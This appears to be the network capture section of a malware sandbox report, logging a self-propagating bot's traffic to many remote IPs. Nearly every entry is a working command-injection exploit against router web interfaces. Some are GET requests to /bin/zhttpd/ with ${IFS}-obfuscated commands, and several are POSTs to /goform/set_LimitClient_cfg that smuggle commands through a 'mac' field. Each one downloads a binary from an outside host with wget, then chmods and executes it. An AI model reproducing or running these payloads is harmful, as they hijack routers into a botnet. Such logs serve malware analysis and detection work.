                                                Jan 28, 2024 10:16:27.855359077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5147192.168.2.234179632.213.209.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855379105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5148192.168.2.2341460160.152.199.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855431080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5149192.168.2.2349172134.158.124.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855473995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5150192.168.2.234168850.238.38.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855495930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5151192.168.2.2350094144.48.91.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855498075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5152192.168.2.2339932105.33.70.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855520010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5153192.168.2.2341800206.183.75.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855559111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5154192.168.2.2360596219.50.95.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855588913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5155192.168.2.2341878170.130.67.178080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.596848965 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:28.737720966 CET1286INHTTP/1.0 400 Bad Request
                                                Server: squid/3.1.23
                                                Mime-Version: 1.0
                                                Date: Sun, 28 Jan 2024 20:44:09 GMT
                                                Content-Type: text/html
                                                Content-Length: 3181
                                                X-Squid-Error: ERR_INVALID_URL 0
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5156192.168.2.2345016163.191.116.1178080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.724210978 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:29.125448942 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:29.925242901 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:31.493016005 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5157192.168.2.233339093.5.68.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863058090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5158192.168.2.2350362188.91.234.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863078117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5159192.168.2.235444636.167.114.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863092899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5160192.168.2.2351484205.66.42.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863130093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5161192.168.2.2360626144.215.228.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863157988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5162192.168.2.233802697.157.62.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863181114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5163192.168.2.235868070.173.20.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863197088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5164192.168.2.2345330159.169.25.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863209963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5165192.168.2.235418049.238.46.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863260984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5166192.168.2.235623670.135.175.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863286972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5167192.168.2.234178057.23.94.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863332987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5168192.168.2.2352750218.10.174.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863354921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5169192.168.2.234304835.2.43.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863385916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5170192.168.2.2350638164.247.122.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863404989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5171192.168.2.2341536195.93.121.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863454103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5172192.168.2.233784639.21.253.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863471985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5173192.168.2.2354226136.60.80.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863509893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5174192.168.2.234877676.214.252.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863532066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5175192.168.2.2350738122.11.86.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863586903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5176192.168.2.2360622101.156.25.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863605976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5177192.168.2.2352348145.51.114.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863641024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5178192.168.2.234296272.30.139.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863655090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5179192.168.2.2356390186.47.210.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863692045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5180192.168.2.2358174189.199.141.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863723993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5181192.168.2.2348020188.21.158.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863742113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5182192.168.2.2350090218.201.110.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863750935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5183192.168.2.233831634.253.134.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.863780022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5184192.168.2.2348714173.164.177.76443
                                                TimestampBytes transferredDirectionData
